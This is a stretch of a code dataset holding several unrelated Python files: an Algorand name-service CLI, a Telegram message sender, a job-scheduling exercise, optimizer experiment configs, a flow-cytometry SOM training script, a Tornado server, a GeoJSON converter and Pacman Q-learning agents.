100000 + 100000\nMINIMUM_TXN_FEE = 1000\n\n\ndef _lsig(program, txn):\n return transaction.LogicSigTransaction(txn, transaction.LogicSigAccount(program))\n\n\ndef _approval_program():\n success = Return(Int(1))\n on_set = Seq(\n [\n App.localPut(\n Txn.sender(), Txn.application_args[1], Txn.application_args[2]\n ),\n Return(Int(1)),\n ]\n )\n on_noop = Cond([Txn.application_args[0] == Bytes(\"Set\"), on_set])\n program = Cond(\n [Txn.application_id() == Int(0), success],\n [Txn.on_completion() == OnComplete.OptIn, success],\n [Txn.on_completion() == OnComplete.CloseOut, success],\n [Txn.on_completion() == OnComplete.NoOp, on_noop],\n )\n return compileTeal(program, Mode.Application, version=5)\n\n\ndef _clear_state_program():\n program = Return(Int(1))\n return compileTeal(program, Mode.Application, version=5)\n\n\nclass NamedAccount(template.Template):\n def __init__(self, name_service_id, name):\n self.name_service_id = name_service_id\n if isinstance(name, str):\n name = name.encode(\"utf-8\")\n self.name = name\n\n def get_program(self):\n program = bytearray()\n # version\n template.put_uvarint(program, 5)\n program.append(0x80) # pushbytes\n template.put_uvarint(program, 32)\n program.extend(sha512_256(self.name))\n program.append(0x81) # pushint\n template.put_uvarint(program, self.name_service_id)\n # pop; pop; pushint 1\n program.extend([0x48, 0x48, 0x81, 0x01])\n return bytes(program)\n\n def initialize(self, sp, funding_address, update_authority):\n acl = get_algod()\n program = self.get_program()\n addr = self.get_address()\n fund_txn = transaction.PaymentTxn(\n funding_address, sp, addr, MINIMUM_BALANCE + MIN_TXN_FEE\n )\n optin_txn = transaction.ApplicationOptInTxn(\n addr, sp, DEFAULT_APP_ID, rekey_to=update_authority\n )\n group = [fund_txn, optin_txn]\n transaction.assign_group_id(group)\n return (fund_txn, _lsig(program, optin_txn))\n\n def update_data(self, sp, data_index, data):\n return transaction.ApplicationCallTxn(\n self.get_address(),\n sp,\n DEFAULT_APP_ID,\n transaction.OnComplete.NoOpOC.real,\n app_args=[b\"Set\", data_index, data],\n )\n\n def close(self, sp, remainder_to):\n close_out = transaction.ApplicationCloseOutTxn(\n self.get_address(), sp, DEFAULT_APP_ID\n )\n payback = transaction.PaymentTxn(\n self.get_address(),\n sp,\n self.get_address(),\n 0,\n close_remainder_to=remainder_to,\n )\n transaction.assign_group_id([close_out, payback])\n return close_out, payback\n\n\n@click.group(\"name\")\ndef command_group():\n pass\n\n\n@command_group.command(\"deploy\")\ndef name_deploy():\n kcl = get_kmd()\n acl = get_algod()\n wallets = kcl.list_wallets()\n wallet_handle = kcl.init_wallet_handle(wallets[0][\"id\"], \"\")\n creator = kcl.list_keys(wallet_handle)[0]\n approval_bytecode = acl.compile(_approval_program())\n clear_state_bytecode = acl.compile(_clear_state_program())\n suggested_params = acl.suggested_params()\n global_schema = transaction.StateSchema(0, 0)\n local_schema = transaction.StateSchema(0, 16)\n txn = transaction.ApplicationCreateTxn(\n creator,\n suggested_params,\n transaction.OnComplete.NoOpOC.real,\n base64.b64decode(approval_bytecode[\"result\"]),\n base64.b64decode(clear_state_bytecode[\"result\"]),\n global_schema,\n local_schema,\n )\n signed_txn = kcl.sign_transaction(wallet_handle, \"\", txn)\n acl.send_transaction(signed_txn)\n transaction.wait_for_confirmation(acl, signed_txn.get_txid(), 5)\n transaction_response = acl.pending_transaction_info(signed_txn.get_txid())\n app_id = transaction_response[\"application-index\"]\n print(\"Created new app-id:\", app_id)\n\n\n@command_group.command(\"create\")\n@click.argument(\"name\")\n@click.argument(\"authority\")\ndef name_create(name, authority):\n acl = get_algod()\n kcl = get_kmd()\n acct = NamedAccount(DEFAULT_APP_ID, name)\n suggested_params = acl.suggested_params()\n wallets = kcl.list_wallets()\n wallet_handle = kcl.init_wallet_handle(wallets[0][\"id\"], \"\")\n fund, optin = acct.initialize(suggested_params, authority, authority)\n signed_fund = kcl.sign_transaction(wallet_handle, \"\", fund)\n group_txid = acl.send_transactions([signed_fund, optin])\n transaction.wait_for_confirmation(acl, group_txid, 5)\n pass\n\n\n@command_group.command(\"delete\")\n@click.argument(\"signer\")\n@click.argument(\"receiver\")\n@click.argument(\"name\")\ndef name_delete(signer, receiver, name):\n acl = get_algod()\n kcl = get_kmd()\n acct = NamedAccount(DEFAULT_APP_ID, name)\n suggested_params = acl.suggested_params()\n wallets = kcl.list_wallets()\n wallet_handle = kcl.init_wallet_handle(wallets[0][\"id\"], \"\")\n close_out, payback = acct.close(suggested_params, receiver)\n signed_close_out = kcl.sign_transaction(\n wallet_handle, \"\", close_out, signing_address=raw_signing_address(signer)\n )\n signed_payback = kcl.sign_transaction(\n wallet_handle, \"\", payback, signing_address=raw_signing_address(signer)\n )\n txid = acl.send_transactions([signed_close_out, signed_payback])\n transaction.wait_for_confirmation(acl, txid, 5)\n\n\n@command_group.command(\"update\")\n@click.argument(\"signer\")\n@click.argument(\"name\")\n@click.argument(\"index\")\n@click.argument(\"data\")\ndef name_update(signer, name, index, data):\n acl = get_algod()\n kcl = get_kmd()\n acct = NamedAccount(DEFAULT_APP_ID, name)\n suggested_params = acl.suggested_params()\n wallets = kcl.list_wallets()\n wallet_handle = kcl.init_wallet_handle(wallets[0][\"id\"], \"\")\n txn = acct.update_data(\n suggested_params, index.encode(\"utf-8\"), data.encode(\"utf-8\")\n )\n signed_txn = kcl.sign_transaction(\n wallet_handle,\n \"\",\n txn,\n signing_address=raw_signing_address(signer),\n )\n acl.send_transaction(signed_txn)\n transaction.wait_for_confirmation(acl, signed_txn.get_txid(), 5)\n\n\n@command_group.command(\"get\")\n@click.argument(\"name\")\n@click.argument(\"index\")\ndef name_get(name, index):\n acl = get_algod()\n acct = NamedAccount(DEFAULT_APP_ID, name)\n info = acl.account_info(acct.get_address())\n b64_index = base64.b64encode(index.encode(\"utf-8\")).decode(\"utf-8\")\n for app_state in info[\"apps-local-state\"]:\n if app_state[\"id\"] == DEFAULT_APP_ID:\n if \"key-value\" in app_state:\n for key_value in app_state[\"key-value\"]:\n if key_value[\"key\"] == b64_index:\n print(\n base64.b64decode(key_value[\"value\"][\"bytes\"]).decode(\n \"utf-8\"\n )\n )\n return\n click.echo(\"couldn't find a value for the given key\", err=True)\n sys.exit(1)\n","repo_name":"eiz/algovault","sub_path":"algovault/naming.py","file_name":"naming.py","file_ext":"py","file_size_in_byte":7549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73896709921","text":"#\n# Simple Telegram Messenger\n# @author: bartjan@pc-mania.nl\n# Jun-21,2019\n#\n# https://github.com/barreljan/Telegram\n\nimport requests\n\n\nclass Messenger(object):\n def __init__(self, bot_id=\"\", chat_id=\"\"):\n if not bot_id:\n raise SystemExit('Missing `bot_id` during initiate')\n if not chat_id:\n raise SystemExit('Missing `chat_id` during initiate')\n self.api_bot_id = str(bot_id)\n self.api_chat_id = str(chat_id)\n self.api_endpoint = 'https://api.telegram.org/{}/sendMessage'.format(self.api_bot_id)\n\n def send(self, msg=\"\"):\n if msg:\n _msg = str(msg)\n else:\n raise SystemExit('Message can not be empty')\n\n post_data = {'chat_id': self.api_chat_id,\n 'text': _msg}\n try:\n requests.post(url=self.api_endpoint, data=post_data)\n except:\n raise SystemExit('Something went wrong or can not connect to API...')\n\n","repo_name":"barreljan/Telegram","sub_path":"Telegram.py","file_name":"Telegram.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"21434419040","text":"def jobScheduling(jobs):\n \n # Write your code here\n # Return an integer denoting the maximum pofit \n n = len(jobs)\n jobs = sorted(jobs, key = lambda x: x[2], reverse = True)\n \n print(jobs)\n maxx = 0\n for i in range(n):\n maxx = max(maxx, jobs[i][1])\n profit = 0\n \n slots = [-1 for _ in range(maxx+1)]\n for i in range(n):\n for j in range(jobs[i][1], 0, -1):\n if slots[j] == -1:\n slots[j] = i\n profit += jobs[i][2]\n break\n \n return profit\n\n\njobs = [(1,4,20),(2,1,10),(3,1,40),(4,1,30)]\nN = 4\nprint(jobScheduling(jobs))","repo_name":"Bruces1998/DSA","sub_path":"greedy/job_scheduling.py","file_name":"job_scheduling.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74152683360","text":"from haven import haven_utils as hu\nimport itertools \nimport numpy as np\n\ndef get_benchmark(benchmark,\n opt_list,\n batch_size = 1,\n runs = [0,1,2,3,4],\n max_epoch=[50],\n losses=[\"logistic_loss\", \"squared_loss\", \"squared_hinge_loss\"]\n ):\n \n if benchmark in [\"mushrooms\", \"mushrooms_diagonal\"]:\n return {\"dataset\":[\"mushrooms\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./8000,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"ijcnn\":\n return {\"dataset\":[\"ijcnn\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./35000,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark in [\"a1a\", \"a1a_diagonal\"]:\n return {\"dataset\":[\"a1a\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./1600,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"a2a\":\n return {\"dataset\":[\"a2a\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./2300,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark in [\"w8a\", \"w8a_diagonal\"]:\n return {\"dataset\":[\"w8a\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./50000,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"covtype\":\n return {\"dataset\":[\"covtype\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./500000,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"phishing\":\n return {\"dataset\":[\"phishing\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1e-4,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"rcv1\":\n return {\"dataset\":[\"rcv1\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./20000,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"synthetic_interpolation\":\n return {\"dataset\":[\"synthetic\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":0.,\n \"margin\":[0.1],\n \"false_ratio\" : [0, 0.1, 0.2],\n \"n_samples\": [10000],\n \"d\": [200],\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n else:\n print(\"Benchmark unknown\")\n return\n \n\nEXP_GROUPS = {}\nMAX_EPOCH = 50\nRUNS = [0, 1, 2, 3, 4]\nbenchmarks_list = [\"mushrooms\", \"ijcnn\", \"a1a\", \"a2a\", \"w8a\", \"rcv1\", \"covtype\", \"phishing\"]\nbenchmarks_diagonal_list = [\"a1a_diagonal\", \"mushrooms_diagonal\", \"w8a_diagonal\"]\nbenchmarks_interpolation_list = [\"synthetic_interpolation\"]\n\nfor benchmark in benchmarks_list + benchmarks_diagonal_list + benchmarks_interpolation_list:\n EXP_GROUPS[\"exp_%s\" % benchmark] = []\n \n \n#=== Setting up scalar vs diagonal experiments ===\n\nfor batch_size in [64]:\n opt_list = []\n for variant in [\"diagonal\", \"scalar\"]:\n opt_list += [{'name':'AdaSVRG_General',\n 'r':1/batch_size,\n 'init_step_size':None,\n 'linesearch_option':1,\n 'adaptive_termination':0,\n 'variant':variant}]\n \n for benchmark in benchmarks_diagonal_list:\n EXP_GROUPS['exp_%s' % benchmark] += hu.cartesian_exp_group(get_benchmark(benchmark, opt_list, batch_size=batch_size, max_epoch=[50], runs=[0, 1, 2, 3, 4], losses=['logistic_loss']))\n\n#=== Setting up main experiments ===\n\nfor batch_size in [1, 8, 64, 128]:\n opt_list = []\n \n # Baseline optimizers\n for eta in [1e-3, 1e-2, 1e-1, 1, 10, 100]:\n \n opt_list += [{'name':'SVRG_BB',\n 'r':1/batch_size,\n 'init_step_size':eta}]\n \n opt_list += [{'name':'SVRG',\n 'r':1/batch_size,\n 'adaptive_termination':0,\n 'init_step_size':eta}]\n \n opt_list += [{'name':'SVRG_Loopless',\n 'r':1/batch_size,\n 'init_step_size':eta}]\n\n opt_list += [{'name':'SARAH',\n 'r':1/batch_size,\n 'init_step_size':eta}]\n \n #AdaSVRG without adaptive termination\n opt_list += [{'name':'AdaSVRG',\n 'r':1/batch_size,\n 'init_step_size':None,\n 'linesearch_option':1,\n 'adaptive_termination':0}]\n\n #AdaSVRG with adaptive termination\n opt_list += [{'name':'AdaSVRG',\n 'r':10/batch_size,\n 'init_step_size':None,\n 'linesearch_option':1,\n 'adaptive_termination':1,\n 'threshold_at':0.5}]\n \n\n \n for benchmark in benchmarks_list:\n EXP_GROUPS['exp_%s' % benchmark] += hu.cartesian_exp_group(get_benchmark(benchmark, opt_list, batch_size=batch_size, max_epoch=[MAX_EPOCH], runs=RUNS, losses=['logistic_loss', 'squared_loss', 'huber_loss']))\n\n\n\n#=== Setting up interpolation experiment ===\n \nfor batch_size in [1, 8, 64, 128]:\n opt_list = []\n \n # Hybrid method\n opt_list +=[{'name':'AdaGrad_AdaSVRG', \n \"init_step_size\": 1000,\n \"r\":1/batch_size,\n \"max_epoch_sgd\":MAX_EPOCH, \n \"adaptive_termination\":1,\n \"threshold_at\": 0.5,\n \"linesearch_option_sgd_ada\":1}]\n \n # Find optimal manual switching\n for max_epoch_sgd in range(1, MAX_EPOCH):\n opt_list +=[{'name':'AdaGrad_AdaSVRG', \n \"init_step_size\": 1000,\n \"r\":1/batch_size,\n \"max_epoch_sgd\":max_epoch_sgd,\n \"adaptive_termination\":0,\n \"linesearch_option_sgd_ada\":1}]\n \n # Adagrad with linesearch\n opt_list +=[{'name':'AdaGrad', \n \"init_step_size\": 1000,\n \"r\":1/batch_size,\n \"linesearch_option\":1,\n \"beta\":0.7,\n \"c\":0.5}]\n \n # AdaSVRG without adaptive termination\n opt_list += [{'name':'AdaSVRG',\n 'r':1/batch_size,\n 'init_step_size':None,\n 'linesearch_option':1,\n 'adaptive_termination':0}]\n \n # SVRG\n for eta in [1e-4, 1e-3, 1e-2, 1e-1, 1, 10, 100, 1000]:\n opt_list += [{'name':'SVRG',\n 'r':1/batch_size,\n 'init_step_size':eta}]\n\n \n for benchmark in benchmarks_interpolation_list:\n EXP_GROUPS['exp_%s' % benchmark] += hu.cartesian_exp_group(get_benchmark(benchmark, opt_list=opt_list, batch_size=batch_size, runs=RUNS, losses=[\"squared_hinge_loss\", \"logistic_loss\"], max_epoch=[MAX_EPOCH])) \n\n \n","repo_name":"bpauld/AdaSVRG","sub_path":"exp_configs.py","file_name":"exp_configs.py","file_ext":"py","file_size_in_byte":7708,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"41078157495","text":"#!/usr/bin/env python3\n\"\"\"\nTrain a reference SOM and optionally use that to transform the given\ndataset.\n\"\"\"\nimport logging\nimport json\nfrom collections import defaultdict\n\nimport pandas as pd\nfrom argmagic import argmagic\n\nfrom flowcat import utils, io_functions, sommodels\nfrom flowcat.dataset import case_dataset\nfrom flowcat.dataset.fcs import extract_name\n\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef transform_cases(dataset, model, output):\n \"\"\"Create individidual SOMs for all cases in the dataset.\n Args:\n dataset: CaseIterable with a number of cases, for which SOMs should be\n generated.\n model: Model with initial weights, which should be used for generation\n of SOMs.\n output: Output directory for SOMs\n\n Returns:\n Nothing.\n \"\"\"\n output.mkdir()\n casesamples = defaultdict(list)\n for case, somsample in utils.time_generator_logger(model.transform_generator(dataset)):\n sompath = output / f\"{case.id}_t{somsample.tube}.npy\"\n io_functions.save_som(somsample.data, sompath, save_config=False)\n somsample.data = None\n somsample.path = sompath\n casesamples[case.id].append(somsample)\n\n somcases = []\n for case in dataset:\n somcases.append(case.copy(samples=casesamples[case.id]))\n\n somcollection = case_dataset.CaseCollection(somcases)\n io_functions.save_json(somcollection, output + \".json\")\n\n labels = [{\"label\": case.id, \"randnum\": 0, \"group\": case.group} for case in dataset]\n # Save metadata into an additional csv file with the same name\n metadata = pd.DataFrame(labels)\n io_functions.save_csv(metadata, output + \".csv\")\n io_functions.save_json(\n {\n tube: {\n \"dims\": m.model.dims,\n \"channels\": m.model.markers,\n } for tube, m in model.models.items()\n }, output + \"_config.json\")\n\n\ndef train_model(\n dataset,\n markers=None,\n tensorboard=None,\n modelargs=None,\n) -> sommodels.casesom.CaseSom:\n \"\"\"Create and train a SOM model using the given dataset.\"\"\"\n if modelargs is None:\n modelargs = {\n \"marker_name_only\": False,\n \"max_epochs\": 10,\n \"batch_size\": 50000,\n \"initial_radius\": 16,\n \"end_radius\": 2,\n \"radius_cooling\": \"linear\",\n # \"marker_images\": sommodels.fcssom.MARKER_IMAGES_NAME_ONLY,\n \"map_type\": \"toroid\",\n \"dims\": (32, 32, -1),\n \"scaler\": \"MinMaxScaler\",\n }\n\n if markers:\n selected_markers = io_functions.load_json(markers)\n else:\n selected_markers = dataset.selected_markers\n # modify marker names if marker_name_only\n if modelargs.get(\"marker_name_only\", False):\n selected_markers = {\n tube: [extract_name(marker) for marker in markers]\n for tube, markers in selected_markers.items()\n }\n\n model = sommodels.casesom.CaseSom(\n tubes=selected_markers,\n tensorboard_dir=tensorboard,\n modelargs=modelargs,\n )\n model.train(dataset)\n return model\n\n\ndef main(\n data: utils.URLPath,\n meta: utils.URLPath,\n output: utils.URLPath,\n reference_ids: utils.URLPath = None,\n reference: utils.URLPath = None,\n tensorboard_dir: utils.URLPath = None,\n modelargs: json.loads = None,\n transargs: json.loads = None,\n mode: str = \"fit_transform\",\n):\n \"\"\"\n Train a SOM and use its weights to initialize individual SOM training.\n\n Args:\n data: Path to fcs data.\n meta: Path to dataset metadata, this should correctly reference fcs data.\n output: Path to output model and transformed cases.\n reference_ids: Optionally list ids to be used for reference SOM generation.\n reference: Optionally use pretrained model.\n modelargs: Optionally give specific options for reference SOM generation.\n transargs: Optionally give specific options for transforming individual SOMs.\n mode: Whether to fit or to transform. Default both.\n \"\"\"\n dataset = io_functions.load_case_collection(data, meta)\n\n if reference is None:\n reference_ids = io_functions.load_json(reference_ids)\n reference_dataset = dataset.filter(labels=reference_ids)\n print(\"Training reference SOM on\", reference_dataset)\n reference = train_model(reference_dataset, modelargs=modelargs)\n reference_output = output / \"reference\"\n io_functions.save_casesom(reference, reference_output)\n reference = reference_output\n\n if mode == \"fit\":\n return\n\n if transargs is None:\n transargs = {\n \"max_epochs\": 4,\n \"batch_size\": 50000,\n \"initial_radius\": 4,\n \"end_radius\": 1,\n }\n\n model = io_functions.load_casesom(\n reference,\n tensorboard_dir=tensorboard_dir,\n **transargs\n )\n\n som_output = output / \"som\"\n transform_cases(dataset, model, som_output)\n\n\nif __name__ == \"__main__\":\n handlers = [\n utils.create_handler(logging.StreamHandler(), level=logging.INFO)\n ]\n\n utils.add_logger(\"flowcat\", handlers, level=logging.DEBUG)\n utils.add_logger(LOGGER, handlers, level=logging.DEBUG)\n argmagic(main)\n","repo_name":"xiamaz/flowCat","sub_path":"scripts/01_generate_soms.py","file_name":"01_generate_soms.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"18871637218","text":"import tornado.ioloop\nimport tornado.web\nfrom tornado.options import define, options, parse_command_line\n\nfrom url import url\n\ndefine('port', default=8005, help='run on th given port', type=int)\ndefine('debug', default=False, help='run in debug mode')\n\ndef main():\n parse_command_line()\n app = tornado.web.Application(\n handlers=url,\n debug=options.debug,\n )\n app.listen(options.port)\n print(f'Development server is running at http://127.0.0.1:{options.port}/')\n print('Quit the server with Control-C')\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"microsoft/OneLabeler","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"54"} +{"seq_id":"35579259493","text":"\nDEVICE_ID_TO_LOC = {\n 'pi1': [6.562143, 46.518774, 0],\n 'pi2': [6.561868, 46.518270, 0],\n 'pi3': [6.563111, 46.518574, 0]\n}\n\nGET_STATS = {\n 'pi1': [20, 6],\n 'pi2': [20, 6],\n 'pi3': [20, 6]\n}\n\n\ndef to_geojson_format(item):\n \n count = item['count']\n timestamp = item['timestamp']\n deviceId = item['deviceId']\n \n location = DEVICE_ID_TO_LOC[deviceId]\n \n # avg_count, std_div_count = GET_STATS[deviceId]\n # import random\n # mag = random.randint(0, 6)#abs(count - avg_count) / std_div_count\n mag = count\n \n geo_item = {}\n geo_item['type'] = 'Feature'\n \n geo_item['properties'] = { \"id\": deviceId, \"mag\": mag, \"time\": timestamp, \"felt\": None, \"tsunami\": 0 }\n \n geo_item['geometry'] = { \"type\": \"Point\", \"coordinates\": location }\n \n return geo_item\n \n \ndef transform_to_geojson(items):\n \n geojson_items = {}\n \n geojson_items['type'] = \"FeatureCollection\"\n \n geojson_items['crs'] = { \"type\": \"name\", \"properties\": { \"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\" } }\n \n \n geojson_items['features'] = []\n \n for item in items:\n geo_item = to_geojson_format(item)\n geojson_items['features'].append(geo_item)\n \n return geojson_items","repo_name":"Nacho114/crowdbase","sub_path":"server/getCrowdData/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71667815201","text":"# qlearningAgents.py\n# ------------------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n#\n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\nfrom game import *\nfrom learningAgents import ReinforcementAgent\nfrom featureExtractors import *\n\nimport random, util, math\nfrom collections import defaultdict\nimport pickle\nimport numpy as np\nimport os\n\n\n\n\nq_per_move=[]\nq_per_episode=[]\n\n# if not os.path.exists('./q_diff.pickle'):\n# epsilone_q = dict()\n# with open('q_diff.pickle', 'wb') as f:\n# pickle.dump(ep, f, pickle.HIGHEST_PROTOCOL)\n\nif not os.path.exists('./q_diff_alpha.pickle'):\n epsilone_q = dict()\n with open('q_diff_alpha.pickle', 'wb') as f:\n pickle.dump(epsilone_q, f, pickle.HIGHEST_PROTOCOL)\n\n\n\n\n\n\nclass QLearningAgent(ReinforcementAgent):\n \"\"\"\n Q-Learning Agent\n\n Functions you should fill in:\n - computeValueFromQValues\n - computeActionFromQValues\n - getQValue\n - getAction\n - update\n\n Instance variables you have access to\n - self.epsilon (exploration prob)\n - self.alpha (learning rate)\n - self.discount (discount rate)\n\n Functions you should use\n - self.getLegalActions(state)\n which returns legal actions for a state\n \"\"\"\n\n def __init__(self, **args):\n \"You can initialize Q-values here...\"\n ReinforcementAgent.__init__(self, **args)\n\n \"*** YOUR CODE HERE ***\"\n self.Q = util.Counter()\n\n def getQValue(self, state, action):\n \"\"\"\n Returns Q(state,action)\n Should return 0.0 if we have never seen a state\n or the Q node value otherwise\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n return self.Q[(state, action)]\n\n def computeValueFromQValues(self, state):\n \"\"\"\n Returns max_action Q(state,action)\n where the max is over legal actions. Note that if\n there are no legal actions, which is the case at the\n terminal state, you should return a value of 0.0.\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n actions = self.getLegalActions(state)\n\n tmp_dict = util.Counter()\n\n for action in actions:\n tmp_dict[action] = self.getQValue(state, action)\n return tmp_dict[tmp_dict.argMax()]\n\n def computeActionFromQValues(self, state):\n \"\"\"\n Compute the best action to take in a state. Note that if there\n are no legal actions, which is the case at the terminal state,\n you should return None.\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n actions = self.getLegalActions(state)\n\n tmp_dict = util.Counter()\n for action in actions:\n tmp_dict[action] = self.getQValue(state, action)\n return tmp_dict.argMax()\n\n def getAction(self, state):\n \"\"\"\n Compute the action to take in the current state. With\n probability self.epsilon, we should take a random action and\n take the best policy action otherwise. Note that if there are\n no legal actions, which is the case at the terminal state, you\n should choose None as the action.\n\n HINT: You might want to use util.flipCoin(prob)\n HINT: To pick randomly from a list, use random.choice(list)\n \"\"\"\n # Pick Action\n legalActions = self.getLegalActions(state)\n action = None\n \"*** YOUR CODE HERE ***\"\n\n '''\n epsilone 의 확률로 랜덤하게 움직임 \n '''\n if util.flipCoin(self.epsilon):\n action = random.choice(legalActions)\n else:\n action = self.computeActionFromQValues(state)\n\n\n\n\n\n\n\n return action\n\n def update(self, state, action, nextState, reward):\n \"\"\"\n The parent class calls this to observe a\n state = action => nextState and reward transition.\n You should do your Q-Value update here\n\n NOTE: You should never call this function,\n it will be called on your behalf\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n self.Q[(state, action)] = (1 - self.alpha) * self.Q[(state, action)] + self.alpha * (\n reward + self.discount * self.computeValueFromQValues(nextState))\n\n def getPolicy(self, state):\n return self.computeActionFromQValues(state)\n\n def getValue(self, state):\n return self.computeValueFromQValues(state)\n\n\nclass PacmanQAgent(QLearningAgent):\n \"Exactly the same as QLearningAgent, but with different default parameters\"\n\n def __init__(self, epsilon=0.05, gamma=0.8, alpha=0.2, numTraining=0, **args):\n \"\"\"\n These default parameters can be changed from the pacman.py command line.\n For example, to change the exploration rate, try:\n python pacman.py -p PacmanQLearningAgent -a epsilon=0.1\n\n alpha - learning rate\n epsilon - exploration rate\n gamma - discount factor\n numTraining - number of training episodes, i.e. no learning after these many episodes\n \"\"\"\n args['epsilon'] = epsilon\n args['gamma'] = gamma\n args['alpha'] = alpha\n args['numTraining'] = numTraining\n self.index = 0 # This is always Pacman\n QLearningAgent.__init__(self, **args)\n\n def getAction(self, state):\n \"\"\"\n Simply calls the getAction method of QLearningAgent and then\n informs parent of action for Pacman. Do not change or remove this\n method.\n \"\"\"\n action = QLearningAgent.getAction(self, state)\n self.doAction(state, action)\n return action\n\n\nclass ApproximateQAgent(PacmanQAgent):\n \"\"\"\n ApproximateQLearningAgent\n\n You should only have to overwrite getQValue\n and update. All other QLearningAgent functions\n should work as is.\n \"\"\"\n\n def __init__(self, extractor='IdentityExtractor', **args):\n self.featExtractor = util.lookup(extractor, globals())()\n PacmanQAgent.__init__(self, **args)\n self.weights = util.Counter()\n # self.epsilon=0.02\n # self.alpha=0.05\n self.cum_weights = defaultdict(list)\n\n\n def getWeights(self):\n return self.weights\n\n def getQValue(self, state, action):\n \"\"\"\n Should return Q(state,action) = w * featureVector\n where * is the dotProduct operator\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n features = self.featExtractor.getFeatures(state, action)\n ret = 0\n for i in features.keys():\n ret = ret + self.weights[i] * features[i]\n\n return ret\n\n def update(self, state, action, nextState, reward):\n \"\"\"\n Should update your weights based on transition\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n diff = reward + self.discount * self.getValue(nextState) - self.getQValue(state, action)\n q_per_move.append(diff)\n\n\n features = self.featExtractor.getFeatures(state, action)\n for key in features.keys():\n self.weights[key] = self.weights[key] + self.alpha * diff * features[key]\n \"*** DO NOT DELETE BELOW ***\"\n self.write()\n\n def write(self):\n \"\"\"\n DO NOT DELETE\n \"\"\"\n for i in [\"bias\", \"#-of-ghosts-1-step-away\", \"eats-food\", \"closest-food\"]:\n self.cum_weights[i].append(self.weights[i])\n\n def save(self):\n \"\"\"\n DO NOT DELETE\n \"\"\"\n\n with open('./cmu_weights.pkl', 'wb') as f:\n pickle.dump(self.cum_weights, f)\n\n '''\n 아래 코드는 alpha,epsilon 에 따른 diff 값들을 저장하는 코드 \n '''\n\n # with open('./q_diff.pickle', 'rb') as f:\n # ep = pickle.load(f)\n #\n # with open('./q_diff.pickle', 'wb') as f:\n # print(self.epsilon)\n # ep[0.05] = q_per_episode\n # pickle.dump(ep, f, pickle.HIGHEST_PROTOCOL)\n with open('./q_diff_alpha.pickle', 'rb') as f:\n ep = pickle.load(f)\n\n with open('./q_diff_alpha.pickle', 'wb') as f:\n print(self.epsilon)\n ep[1] = q_per_episode\n pickle.dump(ep, f, pickle.HIGHEST_PROTOCOL)\n\n\n\n def final(self, state):\n \"Called at the end of each game.\"\n # call the super-class final method\n\n\n\n PacmanQAgent.final(self, state)\n\n '''\n 에피소드 마다 평균냄 \n '''\n average=sum(q_per_move)/len(q_per_move)\n q_per_episode.append(average)\n q_per_move.clear()\n\n\n\n # did we finish training?\n if self.episodesSoFar == self.numTraining:\n # you might want to print your weights here for debugging\n \"*** YOUR CODE HERE ***\"\n\n\n pass\n\n \"*** DO NOT DELETE BELOW ***\"\n 